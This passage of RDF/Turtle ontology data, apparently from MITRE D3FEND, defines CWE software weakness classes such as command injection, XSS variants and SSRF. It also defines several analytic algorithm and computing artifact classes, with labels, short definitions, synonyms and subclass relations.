neutralizes equivalent special elements." ; rdfs:subClassOf d3f:CWE-75 . d3f:CWE-760 a owl:Class ; rdfs:label "Use of a One-Way Hash with a Predictable Salt" ; d3f:cwe-id "CWE-760" ; d3f:definition "The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product uses a predictable salt as part of the input." ; rdfs:subClassOf d3f:CWE-916 . d3f:CWE-761 a owl:Class, owl:NamedIndividual ; rdfs:label "Free of Pointer not at Start of Buffer" ; d3f:cwe-id "CWE-761" ; d3f:definition "The product calls free() on a pointer to a memory resource that was allocated on the heap, but the pointer is not at the start of the buffer." ; d3f:weakness-of d3f:MemoryFreeFunction ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:MemoryFreeFunction ], d3f:CWE-763 . d3f:CWE-764 a owl:Class ; rdfs:label "Multiple Locks of a Critical Resource" ; d3f:cwe-id "CWE-764" ; d3f:definition "The product locks a critical resource more times than intended, leading to an unexpected state in the system." ; rdfs:subClassOf d3f:CWE-667, d3f:CWE-675 . d3f:CWE-765 a owl:Class ; rdfs:label "Multiple Unlocks of a Critical Resource" ; d3f:cwe-id "CWE-765" ; d3f:definition "The product unlocks a critical resource more times than intended, leading to an unexpected state in the system." ; rdfs:subClassOf d3f:CWE-667, d3f:CWE-675 . d3f:CWE-766 a owl:Class ; rdfs:label "Critical Data Element Declared Public" ; d3f:cwe-id "CWE-766" ; d3f:definition "The product declares a critical variable, field, or member to be public when intended security policy requires it to be private." ; rdfs:subClassOf d3f:CWE-1061, d3f:CWE-732 . d3f:CWE-767 a owl:Class ; rdfs:label "Access to Critical Private Variable via Public Method" ; d3f:cwe-id "CWE-767" ; d3f:definition "The product defines a public method that reads or modifies a private variable." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-768 a owl:Class ; rdfs:label "Incorrect Short Circuit Evaluation" ; d3f:cwe-id "CWE-768" ; d3f:definition "The product contains a conditional statement with multiple logical expressions in which one of the non-leading expressions may produce side effects. This may lead to an unexpected state in the program after the execution of the conditional, because short-circuiting logic may prevent the side effects from occurring." ; rdfs:subClassOf d3f:CWE-691 . d3f:CWE-773 a owl:Class ; rdfs:label "Missing Reference to Active File Descriptor or Handle" ; d3f:cwe-id "CWE-773" ; d3f:definition "The product does not properly maintain references to a file descriptor or handle, which prevents that file descriptor/handle from being reclaimed." ; rdfs:subClassOf d3f:CWE-771 . d3f:CWE-774 a owl:Class ; rdfs:label "Allocation of File Descriptors or Handles Without Limits or Throttling" ; d3f:cwe-id "CWE-774" ; d3f:definition "The product allocates file descriptors or handles on behalf of an actor without imposing any restrictions on how many descriptors can be allocated, in violation of the intended security policy for that actor." ; d3f:synonym "File Descriptor Exhaustion" ; rdfs:subClassOf d3f:CWE-770 . d3f:CWE-775 a owl:Class ; rdfs:label "Missing Release of File Descriptor or Handle after Effective Lifetime" ; d3f:cwe-id "CWE-775" ; d3f:definition "The product does not release a file descriptor or handle after its effective lifetime has ended, i.e., after the file descriptor/handle is no longer needed." ; rdfs:subClassOf d3f:CWE-772 . d3f:CWE-776 a owl:Class ; rdfs:label "Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')" ; d3f:cwe-id "CWE-776" ; d3f:definition "The product uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities." ; d3f:synonym "Billion Laughs Attack", "XEE", "XML Bomb" ; rdfs:subClassOf d3f:CWE-405, d3f:CWE-674 . d3f:CWE-777 a owl:Class ; rdfs:label "Regular Expression without Anchors" ; d3f:cwe-id "CWE-777" ; d3f:definition "The product uses a regular expression to perform neutralization, but the regular expression is not anchored and may allow malicious or malformed data to slip through." ; rdfs:subClassOf d3f:CWE-625 . d3f:CWE-778 a owl:Class ; rdfs:label "Insufficient Logging" ; d3f:cwe-id "CWE-778" ; d3f:definition "When a security-critical event occurs, the product either does not record the event or omits important details about the event when logging it." ; rdfs:subClassOf d3f:CWE-223, d3f:CWE-693 . d3f:CWE-779 a owl:Class ; rdfs:label "Logging of Excessive Data" ; d3f:cwe-id "CWE-779" ; d3f:definition "The product logs too much information, making log files hard to process and possibly hindering recovery efforts or forensic analysis after an attack." ; rdfs:subClassOf d3f:CWE-400 . d3f:CWE-78 a owl:Class, owl:NamedIndividual ; rdfs:label "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" ; d3f:cwe-id "CWE-78" ; d3f:definition "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component." ; d3f:may-be-weakness-of d3f:EvalFunction, d3f:ProcessStartFunction, d3f:UserInputFunction ; d3f:synonym "OS Command Injection", "Shell injection", "Shell metacharacters" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-be-weakness-of ; owl:someValuesFrom d3f:EvalFunction ], [ a owl:Restriction ; owl:onProperty d3f:may-be-weakness-of ; owl:someValuesFrom d3f:UserInputFunction ], [ a owl:Restriction ; owl:onProperty d3f:may-be-weakness-of ; owl:someValuesFrom d3f:ProcessStartFunction ], d3f:CWE-77 . d3f:CWE-780 a owl:Class ; rdfs:label "Use of RSA Algorithm without OAEP" ; d3f:cwe-id "CWE-780" ; d3f:definition "The product uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption." ; rdfs:subClassOf d3f:CWE-327 . d3f:CWE-781 a owl:Class ; rdfs:label "Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code" ; d3f:cwe-id "CWE-781" ; d3f:definition "The product defines an IOCTL that uses METHOD_NEITHER for I/O, but it does not validate or incorrectly validates the addresses that are provided." ; rdfs:subClassOf d3f:CWE-1285 . d3f:CWE-782 a owl:Class ; rdfs:label "Exposed IOCTL with Insufficient Access Control" ; d3f:cwe-id "CWE-782" ; d3f:definition "The product implements an IOCTL with functionality that should be restricted, but it does not properly enforce access control for the IOCTL." ; rdfs:subClassOf d3f:CWE-749 . d3f:CWE-783 a owl:Class ; rdfs:label "Operator Precedence Logic Error" ; d3f:cwe-id "CWE-783" ; d3f:definition "The product uses an expression in which operator precedence causes incorrect logic to be used." ; rdfs:subClassOf d3f:CWE-670 . d3f:CWE-784 a owl:Class ; rdfs:label "Reliance on Cookies without Validation and Integrity Checking in a Security Decision" ; d3f:cwe-id "CWE-784" ; d3f:definition "The product uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user." ; rdfs:subClassOf d3f:CWE-565, d3f:CWE-807 . d3f:CWE-785 a owl:Class ; rdfs:label "Use of Path Manipulation Function without Maximum-sized Buffer" ; d3f:cwe-id "CWE-785" ; d3f:definition "The product invokes a function for normalizing paths or file names, but it provides an output buffer that is smaller than the maximum possible size, such as PATH_MAX." ; rdfs:subClassOf d3f:CWE-120, d3f:CWE-676 . d3f:CWE-789 a owl:Class ; rdfs:label "Memory Allocation with Excessive Size Value" ; d3f:cwe-id "CWE-789" ; d3f:definition "The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated." ; d3f:synonym "Stack Exhaustion" ; rdfs:subClassOf d3f:CWE-1284, d3f:CWE-770 . d3f:CWE-793 a owl:Class ; rdfs:label "Only Filtering One Instance of a Special Element" ; d3f:cwe-id "CWE-793" ; d3f:definition "The product receives data from an upstream component, but only filters a single instance of a special element before sending it to a downstream component." ; rdfs:subClassOf d3f:CWE-792 . d3f:CWE-794 a owl:Class ; rdfs:label "Incomplete Filtering of Multiple Instances of Special Elements" ; d3f:cwe-id "CWE-794" ; d3f:definition "The product receives data from an upstream component, but does not filter all instances of a special element before sending it to a downstream component." ; rdfs:subClassOf d3f:CWE-792 . d3f:CWE-796 a owl:Class ; rdfs:label "Only Filtering Special Elements Relative to a Marker" ; d3f:cwe-id "CWE-796" ; d3f:definition "The product receives data from an upstream component, but only accounts for special elements positioned relative to a marker (e.g. \"at the beginning/end of a string; the second argument\"), thereby missing remaining special elements that may exist before sending it to a downstream component." ; rdfs:subClassOf d3f:CWE-795 . d3f:CWE-797 a owl:Class ; rdfs:label "Only Filtering Special Elements at an Absolute Position" ; d3f:cwe-id "CWE-797" ; d3f:definition "The product receives data from an upstream component, but only accounts for special elements at an absolute position (e.g. \"byte number 10\"), thereby missing remaining special elements that may exist before sending it to a downstream component." ; rdfs:subClassOf d3f:CWE-795 . d3f:CWE-8 a owl:Class ; rdfs:label "J2EE Misconfiguration: Entity Bean Declared Remote" ; d3f:cwe-id "CWE-8" ; d3f:definition "When an application exposes a remote interface for an entity bean, it might also expose methods that get or set the bean's data. These methods could be leveraged to read sensitive information, or to change data in ways that violate the application's expectations, potentially leading to other vulnerabilities." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-80 a owl:Class ; rdfs:label "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)" ; d3f:cwe-id "CWE-80" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \"<\", \">\", and \"&\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages." ; rdfs:subClassOf d3f:CWE-79 . d3f:CWE-804 a owl:Class ; rdfs:label "Guessable CAPTCHA" ; d3f:cwe-id "CWE-804" ; d3f:definition "The product uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor." ; rdfs:subClassOf d3f:CWE-1390, d3f:CWE-863 . d3f:CWE-806 a owl:Class ; rdfs:label "Buffer Access Using Size of Source Buffer" ; d3f:cwe-id "CWE-806" ; d3f:definition "The product uses the size of a source buffer when reading from or writing to a destination buffer, which may cause it to access memory that is outside of the bounds of the buffer." ; rdfs:subClassOf d3f:CWE-805 . d3f:CWE-81 a owl:Class ; rdfs:label "Improper Neutralization of Script in an Error Message Web Page" ; d3f:cwe-id "CWE-81" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters that could be interpreted as web-scripting elements when they are sent to an error page." ; rdfs:subClassOf d3f:CWE-79 . d3f:CWE-82 a owl:Class ; rdfs:label "Improper Neutralization of Script in Attributes of IMG Tags in a Web Page" ; d3f:cwe-id "CWE-82" ; d3f:definition "The web application does not neutralize or incorrectly neutralizes scripting elements within attributes of HTML IMG tags, such as the src attribute." ; rdfs:subClassOf d3f:CWE-83 . d3f:CWE-822 a owl:Class, owl:NamedIndividual ; rdfs:label "Untrusted Pointer Dereference" ; d3f:cwe-id "CWE-822" ; d3f:definition "The product obtains a value from an untrusted source, converts this value to a pointer, and dereferences the resulting pointer." ; d3f:weakness-of d3f:PointerDereferencingFunction ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:PointerDereferencingFunction ], d3f:CWE-119 . d3f:CWE-823 a owl:Class ; rdfs:label "Use of Out-of-range Pointer Offset" ; d3f:cwe-id "CWE-823" ; d3f:definition "The product performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer." ; d3f:synonym "Untrusted pointer offset" ; rdfs:subClassOf d3f:CWE-119 . d3f:CWE-824 a owl:Class, owl:NamedIndividual ; rdfs:label "Access of Uninitialized Pointer" ; d3f:cwe-id "CWE-824" ; d3f:definition "The product accesses or uses a pointer that has not been initialized." ; d3f:weakness-of d3f:PointerDereferencingFunction ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:PointerDereferencingFunction ], d3f:CWE-119 . d3f:CWE-826 a owl:Class ; rdfs:label "Premature Release of Resource During Expected Lifetime" ; d3f:cwe-id "CWE-826" ; d3f:definition "The product releases a resource that is still intended to be used by itself or another actor." ; rdfs:subClassOf d3f:CWE-666 . d3f:CWE-827 a owl:Class ; rdfs:label "Improper Control of Document Type Definition" ; d3f:cwe-id "CWE-827" ; d3f:definition "The product does not restrict a reference to a Document Type Definition (DTD) to the intended control sphere. This might allow attackers to reference arbitrary DTDs, possibly causing the product to expose files, consume excessive system resources, or execute arbitrary http requests on behalf of the attacker." ; rdfs:subClassOf d3f:CWE-706, d3f:CWE-829 . d3f:CWE-830 a owl:Class ; rdfs:label "Inclusion of Web Functionality from an Untrusted Source" ; d3f:cwe-id "CWE-830" ; d3f:definition "The product includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the product, potentially granting total access and control of the product to the untrusted source." ; rdfs:subClassOf d3f:CWE-829 . d3f:CWE-831 a owl:Class ; rdfs:label "Signal Handler Function Associated with Multiple Signals" ; d3f:cwe-id "CWE-831" ; d3f:definition "The product defines a function that is used as a handler for more than one signal." ; rdfs:subClassOf d3f:CWE-364 . d3f:CWE-832 a owl:Class ; rdfs:label "Unlock of a Resource that is not Locked" ; d3f:cwe-id "CWE-832" ; d3f:definition "The product attempts to unlock a resource that is not locked." ; rdfs:subClassOf d3f:CWE-667 . d3f:CWE-833 a owl:Class ; rdfs:label "Deadlock" ; d3f:cwe-id "CWE-833" ; d3f:definition "The product contains multiple threads or executable segments that are waiting for each other to release a necessary lock, resulting in deadlock." ; rdfs:subClassOf d3f:CWE-667 . d3f:CWE-835 a owl:Class ; rdfs:label "Loop with Unreachable Exit Condition ('Infinite Loop')" ; d3f:cwe-id "CWE-835" ; d3f:definition "The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop." ; rdfs:subClassOf d3f:CWE-834 . d3f:CWE-836 a owl:Class ; rdfs:label "Use of Password Hash Instead of Password for Authentication" ; d3f:cwe-id "CWE-836" ; d3f:definition "The product records password hashes in a data store, receives a hash of a password from a client, and compares the supplied hash to the hash obtained from the data store." ; rdfs:subClassOf d3f:CWE-1390 . d3f:CWE-837 a owl:Class ; rdfs:label "Improper Enforcement of a Single, Unique Action" ; d3f:cwe-id "CWE-837" ; d3f:definition "The product requires that an actor should only be able to perform an action once, or to have only one unique action, but the product does not enforce or improperly enforces this restriction." ; rdfs:subClassOf d3f:CWE-799 . d3f:CWE-838 a owl:Class ; rdfs:label "Inappropriate Encoding for Output Context" ; d3f:cwe-id "CWE-838" ; d3f:definition "The product uses or specifies an encoding when generating output to a downstream component, but the specified encoding is not the same as the encoding that is expected by the downstream component." ; rdfs:subClassOf d3f:CWE-116 . d3f:CWE-839 a owl:Class ; rdfs:label "Numeric Range Comparison Without Minimum Check" ; d3f:cwe-id "CWE-839" ; d3f:definition "The product checks a value to ensure that it is less than or equal to a maximum, but it does not also verify that the value is greater than or equal to the minimum." ; d3f:synonym "Signed comparison" ; rdfs:subClassOf d3f:CWE-1023 . d3f:CWE-84 a owl:Class ; rdfs:label "Improper Neutralization of Encoded URI Schemes in a Web Page" ; d3f:cwe-id "CWE-84" ; d3f:definition "The web application improperly neutralizes user-controlled input for executable script disguised with URI encodings." ; rdfs:subClassOf d3f:CWE-79 . d3f:CWE-841 a owl:Class ; rdfs:label "Improper Enforcement of Behavioral Workflow" ; d3f:cwe-id "CWE-841" ; d3f:definition "The product supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence." ; rdfs:subClassOf d3f:CWE-691 . d3f:CWE-842 a owl:Class ; rdfs:label "Placement of User into Incorrect Group" ; d3f:cwe-id "CWE-842" ; d3f:definition "The product or the administrator places a user into an incorrect group." ; rdfs:subClassOf d3f:CWE-286 . d3f:CWE-843 a owl:Class ; rdfs:label "Access of Resource Using Incompatible Type ('Type Confusion')" ; d3f:cwe-id "CWE-843" ; d3f:definition "The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type." ; d3f:synonym "Object Type Confusion" ; rdfs:subClassOf d3f:CWE-704 . d3f:CWE-85 a owl:Class ; rdfs:label "Doubled Character XSS Manipulations" ; d3f:cwe-id "CWE-85" ; d3f:definition "The web application does not filter user-controlled input for executable script disguised using doubling of the involved characters." ; rdfs:subClassOf d3f:CWE-79 . d3f:CWE-86 a owl:Class ; rdfs:label "Improper Neutralization of Invalid Characters in Identifiers in Web Pages" ; d3f:cwe-id "CWE-86" ; d3f:definition "The product does not neutralize or incorrectly neutralizes invalid characters or byte sequences in the middle of tag names, URI schemes, and other identifiers." ; rdfs:subClassOf d3f:CWE-436, d3f:CWE-79 . d3f:CWE-87 a owl:Class ; rdfs:label "Improper Neutralization of Alternate XSS Syntax" ; d3f:cwe-id "CWE-87" ; d3f:definition "The product does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax." ; rdfs:subClassOf d3f:CWE-79 . d3f:CWE-88 a owl:Class ; rdfs:label "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')" ; d3f:cwe-id "CWE-88" ; d3f:definition "The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string." ; rdfs:subClassOf d3f:CWE-77 . d3f:CWE-9 a owl:Class ; rdfs:label "J2EE Misconfiguration: Weak Access Permissions for EJB Methods" ; d3f:cwe-id "CWE-9" ; d3f:definition "If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the product." ; rdfs:subClassOf d3f:CWE-266 . d3f:CWE-90 a owl:Class ; rdfs:label "Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')" ; d3f:cwe-id "CWE-90" ; d3f:definition "The product constructs all or part of an LDAP query using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended LDAP query when it is sent to a downstream component." ; rdfs:subClassOf d3f:CWE-943 . d3f:CWE-910 a owl:Class ; rdfs:label "Use of Expired File Descriptor" ; d3f:cwe-id "CWE-910" ; d3f:definition "The product uses or accesses a file descriptor after it has been closed." ; d3f:synonym "Stale file descriptor" ; rdfs:subClassOf d3f:CWE-672 . d3f:CWE-911 a owl:Class ; rdfs:label "Improper Update of Reference Count" ; d3f:cwe-id "CWE-911" ; d3f:definition "The product uses a reference count to manage a resource, but it does not update or incorrectly updates the reference count." ; rdfs:subClassOf d3f:CWE-664 . d3f:CWE-917 a owl:Class ; rdfs:label "Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')" ; d3f:cwe-id "CWE-917" ; d3f:definition "The product constructs all or part of an expression language (EL) statement in a framework such as a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed." ; d3f:synonym "EL Injection" ; rdfs:subClassOf d3f:CWE-77 . d3f:CWE-918 a owl:Class, owl:NamedIndividual ; rdfs:label "Server-Side Request Forgery (SSRF)" ; d3f:cwe-id "CWE-918" ; d3f:definition "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination." ; d3f:synonym "SSRF", "XSPA" ; d3f:weakness-of d3f:UserInputFunction ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:UserInputFunction ], d3f:CWE-441 . d3f:CWE-920 a owl:Class ; rdfs:label "Improper Restriction of Power Consumption" ; d3f:cwe-id "CWE-920" ; d3f:definition "The product operates in an environment in which power is a limited resource that cannot be automatically replenished, but the product does not properly restrict the amount of power that its operation consumes." ; rdfs:subClassOf d3f:CWE-400 . d3f:CWE-921 a owl:Class ; rdfs:label "Storage of Sensitive Data in a Mechanism without Access Control" ; d3f:cwe-id "CWE-921" ; d3f:definition "The product stores sensitive information in a file system or device that does not have built-in access control." ; rdfs:subClassOf d3f:CWE-922 . d3f:CWE-924 a owl:Class ; rdfs:label "Improper Enforcement of Message Integrity During Transmission in a Communication Channel" ; d3f:cwe-id "CWE-924" ; d3f:definition "The product establishes a communication channel with an endpoint and receives a message from that endpoint, but it does not sufficiently ensure that the message was not modified during transmission." ; rdfs:subClassOf d3f:CWE-345 . d3f:CWE-925 a owl:Class ; rdfs:label "Improper Verification of Intent by Broadcast Receiver" ; d3f:cwe-id "CWE-925" ; d3f:definition "The Android application uses a Broadcast Receiver that receives an Intent but does not properly verify that the Intent came from an authorized source." ; d3f:synonym "Intent Spoofing" ; rdfs:subClassOf d3f:CWE-940 . d3f:CWE-926 a owl:Class ; rdfs:label "Improper Export of Android Application Components" ; d3f:cwe-id "CWE-926" ; d3f:definition "The Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains." ; rdfs:subClassOf d3f:CWE-285 . d3f:CWE-927 a owl:Class ; rdfs:label "Use of Implicit Intent for Sensitive Communication" ; d3f:cwe-id "CWE-927" ; d3f:definition "The Android application uses an implicit intent for transmitting sensitive data to other applications." ; rdfs:subClassOf d3f:CWE-285, d3f:CWE-668 . d3f:CWE-939 a owl:Class ; rdfs:label "Improper Authorization in Handler for Custom URL Scheme" ; d3f:cwe-id "CWE-939" ; d3f:definition "The product uses a handler for a custom URL scheme, but it does not properly restrict which actors can invoke the handler using the scheme." ; rdfs:subClassOf d3f:CWE-862 . d3f:CWE-941 a owl:Class ; rdfs:label "Incorrectly Specified Destination in a Communication Channel" ; d3f:cwe-id "CWE-941" ; d3f:definition "The product creates a communication channel to initiate an outgoing request to an actor, but it does not correctly specify the intended destination for that actor." ; rdfs:subClassOf d3f:CWE-923 . d3f:CWE-942 a owl:Class ; rdfs:label "Permissive Cross-domain Policy with Untrusted Domains" ; d3f:cwe-id "CWE-942" ; d3f:definition "The product uses a cross-domain policy file that includes domains that should not be trusted." ; rdfs:subClassOf d3f:CWE-183, d3f:CWE-863, d3f:CWE-923 . d3f:CWE-95 a owl:Class ; rdfs:label "Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')" ; d3f:cwe-id "CWE-95" ; d3f:definition "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. \"eval\")." ; rdfs:subClassOf d3f:CWE-94 . d3f:CWE-97 a owl:Class ; rdfs:label "Improper Neutralization of Server-Side Includes (SSI) Within a Web Page" ; d3f:cwe-id "CWE-97" ; d3f:definition "The product generates a web page, but does not neutralize or incorrectly neutralizes user-controllable input that could be interpreted as a server-side include (SSI) directive." ; rdfs:subClassOf d3f:CWE-96 . d3f:CWE-98 a owl:Class ; rdfs:label "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')" ; d3f:cwe-id "CWE-98" ; d3f:definition "The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in \"require,\" \"include,\" or similar functions." ; d3f:synonym "Local file inclusion", "RFI", "Remote file include" ; rdfs:subClassOf d3f:CWE-706, d3f:CWE-829 . d3f:CanopyClustering a owl:Class, owl:NamedIndividual ; rdfs:label "Canopy Clustering" ; d3f:d3fend-id "D3A-CC" ; d3f:definition "The canopy clustering algorithm is an unsupervised pre-clustering algorithm often used as preprocessing step for the K-means algorithm or the Hierarchical clustering algorithm. It is intended to speed up clustering operations on large data sets." ; d3f:kb-article """## References Wikipedia. (n.d.). Canopy clustering algorithm. [Link](https://en.wikipedia.org/wiki/Canopy_clustering_algorithm)""" ; rdfs:subClassOf d3f:ClusterAnalysis . d3f:Capability a owl:Class ; rdfs:label "Capability" ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:ExternalThing . d3f:ChatroomClient a owl:Class ; rdfs:label "Chatroom Client" ; d3f:definition "Client software used to describe conduct any form of synchronous conferencing, occasionally even asynchronous conferencing. The term can thus mean any technology ranging from real-time online chat and online interaction with strangers (e.g., online forums) to fully immersive graphical social environments." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:CollaborativeSoftware ; skos:altLabel "Chat Room Client" . d3f:ChildProcess a owl:Class ; rdfs:label "Child Process" ; d3f:definition "A child process in computing is a process created by another process (the parent process). This technique pertains to multitasking operating systems, and is sometimes called a subprocess or traditionally a subtask. There are two major procedures for creating a child process: the fork system call (preferred in Unix-like systems and the POSIX standard) and the spawn (preferred in the modern (NT) kernel of Microsoft Windows, as well as in some historical operating systems)." ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:Process . d3f:Cloud-basedDatabaseApplication a owl:Class, owl:NamedIndividual ; rdfs:label "Cloud-based Database Application" ; d3f:definition "A database application where the underlying infrastructure is managed by a third-party cloud provider. Examples include DynamoDB, Firestore, and CosmosDB." ; d3f:provider d3f:CloudServiceProvider ; d3f:synonym "Serverless Database Application" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:provider ; owl:someValuesFrom d3f:CloudServiceProvider ], d3f:DatabaseServiceApplication . d3f:CloudConfigurationModificationEvent a owl:Class ; rdfs:label "Cloud Configuration Modification Event" ; d3f:definition "An event that updates cloud-hosted resource configurations such as IAM policies, virtual network constructs, storage settings, or managed-service parameters; impacting resource provisioning, access control, functionality, or compliance." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:CloudConfiguration ], d3f:ConfigurationModificationEvent . d3f:CloudServiceSensor a owl:Class, owl:NamedIndividual ; rdfs:label "Cloud Service Sensor" ; d3f:definition "Senses data from cloud service platforms. Including data from cloud service authentications, authorizations, and other activities." ; d3f:monitors d3f:CloudServiceAuthentication, d3f:CloudServiceAuthorization ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:CloudServiceAuthorization ], [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:CloudServiceAuthentication ], d3f:CyberSensor . d3f:ComputeDeviceEvent a owl:Class ; rdfs:label "Compute Device Event" ; d3f:definition "An event capturing the operation, state, or performance of computational hardware, such as CPUs, GPUs, or accelerators. These events reflect processing capacity changes, utilization anomalies, or device health." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:Processor ], d3f:HardwareDeviceEvent . d3f:ComputerCabinet a owl:Class ; rdfs:label "Computer Cabinet" ; d3f:definition "A computer cabinet houses one or more computers and can range in size and material." ; rdfs:seeAlso "IEEE C37.20.2", "https://dbpedia.org/page/Computer_cabinet" ; rdfs:subClassOf d3f:ComputerEnclosure . d3f:ComputerCase a owl:Class ; rdfs:label "Computer Case" ; d3f:definition "A computer case is a computer enclosure which encloses a single primary computer." ; rdfs:seeAlso "https://dbpedia.org/page/Computer_case" ; rdfs:subClassOf d3f:ComputerEnclosure . d3f:ComputingServer a owl:Class ; rdfs:label "Computing Server" ; d3f:definition "A compute server is a system specifically designed to undertake large amounts of computation, usually but not necessarily in a client/server environment." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Server . d3f:Condition a owl:Class ; rdfs:label "Condition" ; d3f:definition "An assumption on which rests the validity or effect of something else." ; rdfs:comment "Less common usage versus state, meant to superclass precondition, postcondition, and effect." ; rdfs:isDefinedBy "n-06768279" ; rdfs:subClassOf d3f:D3FENDCore . d3f:ConfigurationManagementDatabase a owl:Class ; rdfs:label "Configuration Management Database" ; d3f:definition "A database used to store configuration records throughout their lifecycle. The Configuration Management System (CMS) maintains one or more CMDBs, and each CMDB stores attributes of configuration items (CIs), and relationships with other CIs." ; rdfs:isDefinedBy ; rdfs:seeAlso , , ; rdfs:subClassOf d3f:ConfigurationDatabase . d3f:ConsoleOutputFunction a owl:Class ; rdfs:label "Console Output Function" ; d3f:definition "Outputs characters to a computer console." ; rdfs:subClassOf d3f:Subroutine . d3f:ContainerBuildTool a owl:Class ; rdfs:label "Container Build Tool" ; d3f:definition "A software build tool that creates a container (e.g., Docker container) for deployment." ; rdfs:subClassOf d3f:SoftwarePackagingTool . d3f:ContainerRuntime a owl:Class, owl:NamedIndividual ; rdfs:label "Container Runtime" ; d3f:definition "A software layer between a container process and a kernel which often mediates the invocation of a system call." ; d3f:runs d3f:ContainerImage ; rdfs:seeAlso d3f:ContainerProcess, d3f:Kernel, d3f:SystemCall ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:runs ; owl:someValuesFrom d3f:ContainerImage ], d3f:ServiceApplication . d3f:CopyMemoryFunction a owl:Class, owl:NamedIndividual ; rdfs:label "Copy Memory Function" ; d3f:copies d3f:MemoryBlock ; d3f:definition "Copies a memory block from one location to another." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:copies ; owl:someValuesFrom d3f:MemoryBlock ], d3f:Subroutine . d3f:CramersV a owl:Class, owl:NamedIndividual ; rdfs:label "Cramer's V" ; d3f:d3fend-id "D3A-CV" ; d3f:definition "Cramér's V (sometimes referred to as Cramér's phi and denoted as φc) is a measure of association between two nominal variables, giving a value between 0 and +1 (inclusive) and is based on Pearson's chi-squared statistic." ; d3f:kb-article """## References Wikipedia. (n.d.). Cramér's V. [Link](https://en.wikipedia.org/wiki/Cram%C3%A9r%27s_V)""" ; d3f:synonym "Cramer's Phi" ; rdfs:subClassOf d3f:Correlation . d3f:CycleGAN a owl:Class, owl:NamedIndividual ; rdfs:label "CycleGAN" ; d3f:d3fend-id "D3A-CYC" ; d3f:definition "The Cycle Generative Adversarial Network (CycleGAN) is an approach to training a deep convolutional neural network for image-to-image translation tasks by mapping between input and output images using unpaired dataset." ; d3f:kb-article """## References Esri. (n.d.). How CycleGAN Works. [Link](https://developers.arcgis.com/python/guide/how-cyclegan-works/)""" ; rdfs:subClassOf d3f:Image-to-ImageTranslationGAN . d3f:DBSCAN a owl:Class, owl:NamedIndividual ; rdfs:label "DBSCAN" ; d3f:d3fend-id "D3A-DBS" ; d3f:definition "A density-based clustering algorithm that works on the assumption that clusters are dense regions in space separated by regions of lower density." ; d3f:kb-article """## References Analytics Vidhya. (2020, September 15). How DBSCAN Clustering Works: A Comprehensive Guide with Implementations in Python. [Link](https://www.analyticsvidhya.com/blog/2020/09/how-dbscan-clustering-works/#:~:text=DBSCAN%20is%20a%20density%2Dbased,points%20into%20a%20single%20cluster.)""" ; rdfs:subClassOf d3f:Density-basedClustering . d3f:DE-0001 